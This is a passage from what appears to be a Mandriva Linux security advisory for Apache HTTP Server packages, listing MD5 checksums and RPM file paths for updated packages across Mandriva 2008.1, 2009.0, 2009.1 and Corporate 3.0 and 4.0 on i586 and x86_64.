2008.1/x86_64/apache-mod_cache-2.2.8-6.5mdv2008.1.x86_64.rpm eaf9d071b93a0f478e242253b031c2bd 2008.1/x86_64/apache-mod_dav-2.2.8-6.5mdv2008.1.x86_64.rpm d02221dbdac77e5fa1ee1710f5e946dd 2008.1/x86_64/apache-mod_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm 574bb4b1e11c16210e99be0ce029aa10 2008.1/x86_64/apache-mod_deflate-2.2.8-6.5mdv2008.1.x86_64.rpm c3196491613788da66c222dfd1d7608e 2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 9eeb2a7b68bc178dc7917c362d89b5ff 2008.1/x86_64/apache-mod_file_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 5dfc3a189d4e70dde834a84c3a5141fa 2008.1/x86_64/apache-mod_ldap-2.2.8-6.5mdv2008.1.x86_64.rpm 66696247e7ae1a919e0e80fa43544b92 2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 6374972abfd91ab03fe74ac0b9b5fbbd 2008.1/x86_64/apache-mod_proxy-2.2.8-6.5mdv2008.1.x86_64.rpm 6606ff6d4ae5d09716a69938e2b944c6 2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.x86_64.rpm 23ba0203d6876a376e1a1e22e887b54c 2008.1/x86_64/apache-mod_ssl-2.2.8-6.5mdv2008.1.x86_64.rpm b7077a42c6b823d7a744e5ecbe306242 2008.1/x86_64/apache-modules-2.2.8-6.5mdv2008.1.x86_64.rpm fa1ab5a1c4190191c88fb83bf07d3926 2008.1/x86_64/apache-mod_userdir-2.2.8-6.5mdv2008.1.x86_64.rpm abb9e82feea59e2d913dab61c0c1be2f 2008.1/x86_64/apache-mpm-event-2.2.8-6.5mdv2008.1.x86_64.rpm a7e021179bcabb2e6725d7488fac33cf 2008.1/x86_64/apache-mpm-itk-2.2.8-6.5mdv2008.1.x86_64.rpm 64ec4ecc7f6f6557eb95ba61017e00a8 2008.1/x86_64/apache-mpm-prefork-2.2.8-6.5mdv2008.1.x86_64.rpm 5955bfd23bfff88bea08d049bbf1ff88 2008.1/x86_64/apache-mpm-worker-2.2.8-6.5mdv2008.1.x86_64.rpm 91e233e5e4874e2beaa6eff728d1a8df 2008.1/x86_64/apache-source-2.2.8-6.5mdv2008.1.x86_64.rpm 5d895c7c364db08fff0372c3654d1ccd 2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm Mandriva Linux 2009.0: d363852286bffcc1f16be74529c16d8e 2009.0/i586/apache-base-2.2.9-12.3mdv2009.0.i586.rpm 5958b4410e39655375a3fb06704e86cb 2009.0/i586/apache-devel-2.2.9-12.3mdv2009.0.i586.rpm 0d57fe115977bdb79f5550f68e6f0a7c 2009.0/i586/apache-htcacheclean-2.2.9-12.3mdv2009.0.i586.rpm 4d3907f8abc34e0398d2a67df9185f1e 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.i586.rpm 3cf8641644943ef13cff4b6af29cfacb 2009.0/i586/apache-mod_cache-2.2.9-12.3mdv2009.0.i586.rpm 8adb06cd1b0c1364c30c761c49b50d33 2009.0/i586/apache-mod_dav-2.2.9-12.3mdv2009.0.i586.rpm a0bfc1e6a7d9f8862c65c69f759cd093 2009.0/i586/apache-mod_dbd-2.2.9-12.3mdv2009.0.i586.rpm b335c39fe37988f3de26537262dd6b9d 2009.0/i586/apache-mod_deflate-2.2.9-12.3mdv2009.0.i586.rpm f3e11730ca6381f782f60ea7ad703b33 2009.0/i586/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.i586.rpm 8ec10efb81f40dd11e744856a30f1a9e 2009.0/i586/apache-mod_file_cache-2.2.9-12.3mdv2009.0.i586.rpm ca822b5f7ce60c3b2e8ac8ef9c87ea07 2009.0/i586/apache-mod_ldap-2.2.9-12.3mdv2009.0.i586.rpm 6ef2fe37d9056fd08fe10f17f72eb131 2009.0/i586/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.i586.rpm 17e4a0cb1a25f1a1dd34d64527cd69ff 2009.0/i586/apache-mod_proxy-2.2.9-12.3mdv2009.0.i586.rpm f757375865df48bde5fde177bc53f176 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.i586.rpm afa87773aa3485eb3d08482f6c66b723 2009.0/i586/apache-mod_ssl-2.2.9-12.3mdv2009.0.i586.rpm b9b4cebe20f782cf6d61de932ae775fe 2009.0/i586/apache-modules-2.2.9-12.3mdv2009.0.i586.rpm 7caa399d860dce728c05e2a1bbb37b02 2009.0/i586/apache-mod_userdir-2.2.9-12.3mdv2009.0.i586.rpm 991dcf92749cedff7f2b7ea110cbc26d 2009.0/i586/apache-mpm-event-2.2.9-12.3mdv2009.0.i586.rpm 6631e8492a2cfb0c294a844d4437896b 2009.0/i586/apache-mpm-itk-2.2.9-12.3mdv2009.0.i586.rpm 334050ac21bee98ba6cb3275f378c07f 2009.0/i586/apache-mpm-peruser-2.2.9-12.3mdv2009.0.i586.rpm 616f75510fbf462edf494fdf6456f2f0 2009.0/i586/apache-mpm-prefork-2.2.9-12.3mdv2009.0.i586.rpm ec4bc21290ccb97b3f4a89fe395f961e 2009.0/i586/apache-mpm-worker-2.2.9-12.3mdv2009.0.i586.rpm fd5db56435be568aa94e4f256f083640 2009.0/i586/apache-source-2.2.9-12.3mdv2009.0.i586.rpm befd4b86100340246045938e9668b133 2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 12bb10b4fefbe9a41290619b396bbc27 2009.0/x86_64/apache-base-2.2.9-12.3mdv2009.0.x86_64.rpm f9480a489f5fc7bf6f09601c66786166 2009.0/x86_64/apache-devel-2.2.9-12.3mdv2009.0.x86_64.rpm 194e19c4192104e1ce86ccae92bc3678 2009.0/x86_64/apache-htcacheclean-2.2.9-12.3mdv2009.0.x86_64.rpm 83df7eff4ccf56a27dfab4b7e5e55def 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm 7e17cd33c2f77598a55b27de9a1f272f 2009.0/x86_64/apache-mod_cache-2.2.9-12.3mdv2009.0.x86_64.rpm 49b4f14a69e1fe814892d8c1235fff3b 2009.0/x86_64/apache-mod_dav-2.2.9-12.3mdv2009.0.x86_64.rpm 51bf4942dcdfce90ca8d921fcf721d20 2009.0/x86_64/apache-mod_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm 1b95ecf1dd6d8509d764428c2f64f023 2009.0/x86_64/apache-mod_deflate-2.2.9-12.3mdv2009.0.x86_64.rpm 2a269581f79f4261357d78c3a32f5ac9 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.x86_64.rpm b471904247a8663f8894956b02bd3095 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.3mdv2009.0.x86_64.rpm 2f9667e46b23c991813607a53310e5d8 2009.0/x86_64/apache-mod_ldap-2.2.9-12.3mdv2009.0.x86_64.rpm 184b807180f72d4399a4039f6f08d7d8 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.x86_64.rpm cfc41078bac18b0512a44756eb31c727 2009.0/x86_64/apache-mod_proxy-2.2.9-12.3mdv2009.0.x86_64.rpm 4d7e1318e9ca104dce782997d94734f3 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.x86_64.rpm d3613cf215e1617d53761395591c0ee5 2009.0/x86_64/apache-mod_ssl-2.2.9-12.3mdv2009.0.x86_64.rpm 663d9a17a0a131c46ad70aebb9d286a1 2009.0/x86_64/apache-modules-2.2.9-12.3mdv2009.0.x86_64.rpm 4b88b69bb42109d60ed86b3aa0cf6cf0 2009.0/x86_64/apache-mod_userdir-2.2.9-12.3mdv2009.0.x86_64.rpm c0212892e5ccc905bf9c8c27c0fc55a4 2009.0/x86_64/apache-mpm-event-2.2.9-12.3mdv2009.0.x86_64.rpm 845a766d32686438a04562898d658f66 2009.0/x86_64/apache-mpm-itk-2.2.9-12.3mdv2009.0.x86_64.rpm d841f9b7e7898e99f16ecc668a829890 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.3mdv2009.0.x86_64.rpm 55bb3d32f6ad363872d9c27e6eab04a6 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.3mdv2009.0.x86_64.rpm 2ace6623bedb6f5d29d8b79505361ef1 2009.0/x86_64/apache-mpm-worker-2.2.9-12.3mdv2009.0.x86_64.rpm aa3f27740d94b8d2ada54592b3c1deb2 2009.0/x86_64/apache-source-2.2.9-12.3mdv2009.0.x86_64.rpm befd4b86100340246045938e9668b133 2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm Mandriva Linux 2009.1: 43de323093117584b6f981e3440893d9 2009.1/i586/apache-base-2.2.11-10.4mdv2009.1.i586.rpm e4a751411c51ebf3db63c5a70ba555ee 2009.1/i586/apache-devel-2.2.11-10.4mdv2009.1.i586.rpm b013be5a696f29cdd2c0c6da0799dd08 2009.1/i586/apache-htcacheclean-2.2.11-10.4mdv2009.1.i586.rpm 672318a22cff862b606d6f1721650a9b 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.i586.rpm cd318fc1bf8be7106f1c92f0e23f2faa 2009.1/i586/apache-mod_cache-2.2.11-10.4mdv2009.1.i586.rpm f8354758215da0db366c942bde4465fe 2009.1/i586/apache-mod_dav-2.2.11-10.4mdv2009.1.i586.rpm d04f091350b5737c35217b3963cdba21 2009.1/i586/apache-mod_dbd-2.2.11-10.4mdv2009.1.i586.rpm 94ba7bfec4c32d194a157ae285cbfbe6 2009.1/i586/apache-mod_deflate-2.2.11-10.4mdv2009.1.i586.rpm fed83efa0e9315b5f6060535424046fd 2009.1/i586/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.i586.rpm 1b9b91a3a25036edfebe5bcd7f603fd5 2009.1/i586/apache-mod_file_cache-2.2.11-10.4mdv2009.1.i586.rpm f9b090f9e1d5303171884ef6972232e7 2009.1/i586/apache-mod_ldap-2.2.11-10.4mdv2009.1.i586.rpm 7af5d73ac41cf7d8f54251e0d14a6eed 2009.1/i586/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.i586.rpm 509e9bedb5f91343a676045f90bef558 2009.1/i586/apache-mod_proxy-2.2.11-10.4mdv2009.1.i586.rpm 0c68c2755ad96c79f85a155bc079dd74 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.i586.rpm fdd37129c8ce847680456f5c08550968 2009.1/i586/apache-mod_ssl-2.2.11-10.4mdv2009.1.i586.rpm 7549e14f72e5c8d3d6b408d52ef8a38c 2009.1/i586/apache-modules-2.2.11-10.4mdv2009.1.i586.rpm bc066f7e9cd881dfc170953094dc8319 2009.1/i586/apache-mod_userdir-2.2.11-10.4mdv2009.1.i586.rpm d32db804ae96533ca4c7b245eda01f98 2009.1/i586/apache-mpm-event-2.2.11-10.4mdv2009.1.i586.rpm 868f2aaa6ef53c7c60b376202944e2aa 2009.1/i586/apache-mpm-itk-2.2.11-10.4mdv2009.1.i586.rpm 681854ce611a93ec864c58785ab541f5 2009.1/i586/apache-mpm-peruser-2.2.11-10.4mdv2009.1.i586.rpm 8e71ace64ffd0c8c37c83a0a12e1afbe 2009.1/i586/apache-mpm-prefork-2.2.11-10.4mdv2009.1.i586.rpm 5e88459f25f50a6c3cde05a445b32594 2009.1/i586/apache-mpm-worker-2.2.11-10.4mdv2009.1.i586.rpm 611db0cf3570f9f0377586bda61e59b0 2009.1/i586/apache-source-2.2.11-10.4mdv2009.1.i586.rpm 6e8db38ec06bfd8756037dec8ea71ca4 2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: f140d32d2a4083fb5ee324b7572279f2 2009.1/x86_64/apache-base-2.2.11-10.4mdv2009.1.x86_64.rpm 383bab22e1d9a9c61baeb10c3972443d 2009.1/x86_64/apache-devel-2.2.11-10.4mdv2009.1.x86_64.rpm 007f4193dc68dcd34d48ab58bfd615ed 2009.1/x86_64/apache-htcacheclean-2.2.11-10.4mdv2009.1.x86_64.rpm 428b7be1ac06755588bb28dc90b914ae 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm 82158b3767bdb31fea07f5a442fcebd4 2009.1/x86_64/apache-mod_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 085eb05ff541f4699b0d2764b24c023a 2009.1/x86_64/apache-mod_dav-2.2.11-10.4mdv2009.1.x86_64.rpm 7b831282bf0889312f8198c358393332 2009.1/x86_64/apache-mod_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm f78e3d86a7b6af8b46c1864fcabd5455 2009.1/x86_64/apache-mod_deflate-2.2.11-10.4mdv2009.1.x86_64.rpm b985d6447095085c7713902a7253dc07 2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 26e49e2067e11ea114dc8ddcac3d51c6 2009.1/x86_64/apache-mod_file_cache-2.2.11-10.4mdv2009.1.x86_64.rpm e4395af2defe1b01229fe1c4887a5e3b 2009.1/x86_64/apache-mod_ldap-2.2.11-10.4mdv2009.1.x86_64.rpm 08c9824c79e51e956619dd1c1f5b2391 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 125634357057ef66b5a96c3f6d59f887 2009.1/x86_64/apache-mod_proxy-2.2.11-10.4mdv2009.1.x86_64.rpm 48f5cce6d04c185bc8f74e9440d42d49 2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.x86_64.rpm f5353fee0655a944233e95dc542475fc 2009.1/x86_64/apache-mod_ssl-2.2.11-10.4mdv2009.1.x86_64.rpm 181766999217f26744e0b2a7179f074c 2009.1/x86_64/apache-modules-2.2.11-10.4mdv2009.1.x86_64.rpm 9c75cd439b962a013d0a12be52eac839 2009.1/x86_64/apache-mod_userdir-2.2.11-10.4mdv2009.1.x86_64.rpm 5ff7131c77436bd966c50618a23fac1f 2009.1/x86_64/apache-mpm-event-2.2.11-10.4mdv2009.1.x86_64.rpm 2df4ee8eff3152a1c12fdfec6d09a4c7 2009.1/x86_64/apache-mpm-itk-2.2.11-10.4mdv2009.1.x86_64.rpm 3e2e9c63c293ac81654e2792d941a8e5 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.4mdv2009.1.x86_64.rpm db758092a06528c21fe8cb89dc72e44a 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.4mdv2009.1.x86_64.rpm fbd4fa29c8e7fab05e6cd9ee73061e53 2009.1/x86_64/apache-mpm-worker-2.2.11-10.4mdv2009.1.x86_64.rpm 2a3aa46f4a5ef9eb0f4fc60b8688b6d4 2009.1/x86_64/apache-source-2.2.11-10.4mdv2009.1.x86_64.rpm 6e8db38ec06bfd8756037dec8ea71ca4 2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm Corporate 3.0: efc4dd61f307ba7ca3e78b702d14766a corporate/3.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm 85ef73c40780432a49b5b52eaa10174c corporate/3.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm f8668cb4d5d5a7aeeec18ac9089ce224 corporate/3.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm 9c7411c194f42dc2dda22e73b87871ac corporate/3.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm addfed70aa6f5b9b95423166a9d9d2d0 corporate/3.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm 23d16c62736006e63f2290c6474a3c3f corporate/3.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm 4c91c64f68bf7ee1381ba571363ff18b corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm 2e62901ddf70ec979ac1c31965817d5b corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm c98277bc893e194a4cfcc6ee2efddcb9 corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm 76a73eae916527a461e48f535ac92cff corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm e2b217645c51bcecb6bade3230a2eda2 corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm f0ba56775f6d0a1cdc99c897d0b0a619 corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm 29e2b0644b85e489935f195334820f61 corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm 77836bdb2fca0e05208e44dc7ad8742e corporate/3.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm 74ba9e4ba64d33c863919363ab295e62 corporate/3.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm 943e2a0c5fcff6dfc142ff52ba3286eb corporate/3.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm b7bdb08234711c39badc0dc000ca3d20 corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm Corporate 3.0/X86_64: b857a73720d5645127010c91e039a630 corporate/3.0/x86_64/apache2-2.0.48-6.21.C30mdk.x86_64.rpm e6e5eca1cadb862b47804cc09a3bd2b4 corporate/3.0/x86_64/apache2-common-2.0.48-6.21.C30mdk.x86_64.rpm f99582e97f0987e4b0be6add27723183 corporate/3.0/x86_64/apache2-devel-2.0.48-6.21.C30mdk.x86_64.rpm 44072cb59097737b3c00f5e8298ed89b corporate/3.0/x86_64/apache2-manual-2.0.48-6.21.C30mdk.x86_64.rpm 2d333f222f65952cae96754f7f21b604 corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.21.C30mdk.x86_64.rpm 0f5fa126d97dd1edc543a5b5de96c6e7 corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.21.C30mdk.x86_64.rpm 555b2aedd6de7fb706995fb59fa6b4f3 corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.21.C30mdk.x86_64.rpm 1541273d263d9bda5e5eafeba7861e0c corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.x86_64.rpm 295ef0b46ea5949fa0af116042936556 corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.21.C30mdk.x86_64.rpm 0dd4ae154c12f557a71448b5bdb42479 corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.21.C30mdk.x86_64.rpm b93220ceeae20d88f4ae73182b9e72e6 corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.x86_64.rpm 97dc6100022a85442ac7dd7da01fae34 corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.21.C30mdk.x86_64.rpm acb4b5e5955d42cca93d1ebec2328b23 corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.21.C30mdk.x86_64.rpm 1af23190753541fe7d24f9bd85f57b1d corporate/3.0/x86_64/apache2-modules-2.0.48-6.21.C30mdk.x86_64.rpm 305ee3ac2af4c6ef4db046ecb3dd98ec corporate/3.0/x86_64/apache2-source-2.0.48-6.21.C30mdk.x86_64.rpm e35e16fc12456a824a9e85dcfc9dbf0c corporate/3.0/x86_64/lib64apr0-2.0.48-6.21.C30mdk.x86_64.rpm b7bdb08234711c39badc0dc000ca3d20 corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm Corporate 4.0: b9d526a415d82322c308912f97e4f1ae corporate/4.0/i586/apache-base-2.2.3-1.7.20060mlcs4.i586.rpm a31613a66362403a6352d52047836e30 corporate/4.0/i586/apache-devel-2.2.3-1.7.20060mlcs4.i586.rpm dce72691c79bba01ee313fc378b36eb9 corporate/4.0/i586/apache-htcacheclean-2.2.3-1.7.20060mlcs4.i586.rpm b7937f4ef06f280f749c1fe5b7af10d2 corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.i586.rpm 24ead4ff2d81737dcac9d625cdd5aaae corporate/4.0/i586/apache-mod_cache-2.2.3-1.7.20060mlcs4.i586.rpm e1f31a31c845ef295ad5122a78ea3650 corporate/4.0/i586/apache-mod_dav-2.2.3-1.7.20060mlcs4.i586.rpm 5ab10d768e463ae55838d347ec245102 corporate/4.0/i586/apache-mod_dbd-2.2.3-1.7.20060mlcs4.i586.rpm 9b6b94cdeb55e147c7634297761990a0 corporate/4.0/i586/apache-mod_deflate-2.2.3-1.7.20060mlcs4.i586.rpm b1690a889bf2babfc911a2d600eb5081 corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.i586.rpm 7f6bf2cfb1500cc55c3a195cc2b87a84 corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.i586.rpm 6a57c241fab6d850ba46fc232132b2e0 corporate/4.0/i586/apache-mod_ldap-2.2.3-1.7.20060mlcs4.i586.rpm cf6a260d57b93c8e9bfe6fcbb97cb69a corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.i586.rpm 6a92e7840ff05818cca56ed1ee96df62 corporate/4.0/i586/apache-mod_proxy-2.2.3-1.7.20060mlcs4.i586.rpm f179ca37d885c3aaca4669a6173eb0c0 corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.i586.rpm 52a7784816d6b4808a21e87990b40c70 corporate/4.0/i586/apache-mod_ssl-2.2.3-1.7.20060mlcs4.i586.rpm cdc4728fba27771d29728f1b1678d309 corporate/4.0/i586/apache-modules-2.2.3-1.7.20060mlcs4.i586.rpm cc4ca804e4fa51f7c4131ad16902ab9d corporate/4.0/i586/apache-mod_userdir-2.2.3-1.7.20060mlcs4.i586.rpm bdee23bef1375ecbd47aeab1bdc9ed91 corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.i586.rpm 449dfc068e06df184de8d36159b84765 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.7.20060mlcs4.i586.rpm b5bd6a5ed078c35805b4ec2d9a788a79 corporate/4.0/i586/apache-source-2.2.3-1.7.20060mlcs4.i586.rpm f206539ed9c3497f21f26a758d3403b4 corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm Corporate 4.0/X86_64: 15ae114c8d2959ef5c6486029404f689 corporate/4.0/x86_64/apache-base-2.2.3-1.7.20060mlcs4.x86_64.rpm 5198dcd3060de93577812740087fbc8d corporate/4.0/x86_64/apache-devel-2.2.3-1.7.20060mlcs4.x86_64.rpm 93d6afa11a57e157a53716ccf16cf0ef corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.7.20060mlcs4.x86_64.rpm bc92cde6ea8b747d34f0a6ad5ac9e680 corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm 7d08b4692a1e5ba32ffef6d734b96bcc corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm 87fc6d219c07f01a7f201f6bf413ff67 corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.7.20060mlcs4.x86_64.rpm feecfa18e01f0f03a262ea490fb0830f corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm 85a108666e4130d3a6b4fa0fed100aba corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.7.20060mlcs4.x86_64.rpm a2d85bb6cd3d31c0d96f0fec454f2576 corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm e4027426a6dbfab2cb26e71266609ad3 corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm 29df20ff497abe06723103fb5bdf5411 corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.7.20060mlcs4.x86_64.r